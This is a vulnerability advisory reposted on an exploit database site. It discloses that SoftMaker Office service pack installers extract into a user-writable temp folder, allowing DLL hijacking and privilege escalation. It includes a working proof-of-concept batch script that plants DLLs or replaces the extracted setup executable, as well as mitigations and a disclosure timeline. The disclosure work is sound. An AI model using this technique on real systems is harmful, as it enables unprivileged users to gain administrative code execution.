Hi @ll, the service pack installers for SoftMaker Office 201x, available from , are (surprise.-) vulnerable. The executable installer (OUCH) ofw16_763.exe, a 7z SFX (OUCH), creates an UNPROTECTED directory "%TEMP%\7zSxxxxxxxx\" to extract its payload, then executes "%TEMP%\7zSxxxxxxxx\spsetup.exe". "%TEMP%\7zSxxxxxxxx\" inherits the NTFS access rights of its parent "%TEMP%\", i.e. allows full access for the UNPRIVILEGED user. For this well-known vulnerability see and Due to the embedded application manifest which specifies "requireAdministrator" the executable installer can only be run with administrative rights. JFTR: if written properly, it would create a PROTECTED directory "%TEMP%\7zSxxxxxxxx\", writable only for privileged users! The UNPRIVILEGED user as well as any program running with the users credentials can modify the extracted files, for example "%TEMP%\7zSxxxxxxxx\spsetup.exe", which is executed with administrative rights, resulting in arbitrary code execution with elevation of privilege. Additionally "spsetup.exe" is vulnerable to DLL hijacking, another well-known vulnerability. See , , , and plus Thanks to the unprotected directory "%TEMP%\7zSxxxxxxxx\" the unprivileged user can write DLLs to "%TEMP%\7zSxxxxxxxx\" which are loaded by "spsetup.exe", again resulting in arbitrary code execution with elevation of privilege! Proof-of-concept: ~~~~~~~~~~~~~~~~~ 0. download and save it in an arbitrary directory; 1. download (see alias ) and save it in an(other) arbitrary directory; 2. save the following batch script in same the directory as SENTINEL.DLL: --- OFW16_873.CMD --- :WAIT @If Not Exist "%TEMP%\7z*" Goto :WAIT For /D %%! In ("%TEMP%\7z*") Do Set foobar=%%! Copy "SENTINEL.DLL" "%foobar%\NTMARTA.DLL" Copy "SENTINEL.DLL" "%foobar%\VERSION.DLL" Copy "SENTINEL.DLL" "%foobar%\WINSPOOL.DRV" --- EOF --- 3. start the batch script; 4. execute ofw16_873.exe and notice the message boxes displayed by SENTINEL.DLL. PWNED! 5. download to the same directory as the batch script; 6. in the batch script replace the 3 lines Copy ... with Copy "SENTINEL.EXE" "%foobar%\spsetup.exe" 7. start the batch script; 8. execute ofw16_873.exe and notice the message box displayed by SENTINEL.EXE. PWNED! Mitigations: ~~~~~~~~~~~~ * Don't use executable installers! NEVER! Don't use self-extractors! NEVER! See and plus alias for more information. * Practice STRICT privilege separation: NEVER use the so-called "protected" administrator account(s) created during Windows setup which use the same "%TEMP%" for unprivileged and privileged processes! * Add an ACE "(D;OIIO;WP;;;WD)" to the ACL of every "%USERPROFILE%"; use to decode it to "deny execution of files in this directory for everyone, inheritable to all files in all subdirectories". stay tuned Stefan Kanthak Timeline: ~~~~~~~~~ 2016-12-15 sent vulnerability report to vendor no reply, not even an acknowledegement of receipt 2016-12-23 resent vulnerability report to vendor, cc CERT at german BSI no reply, not even an acknowledegement of receipt 2016-12-27 CERT at german BSI contacts vendor offering help no reply, not even an acknowledegement of receipt 2016-12-31 report published # Iranian Exploit DataBase = http://IeDb.Ir [2017-01-05]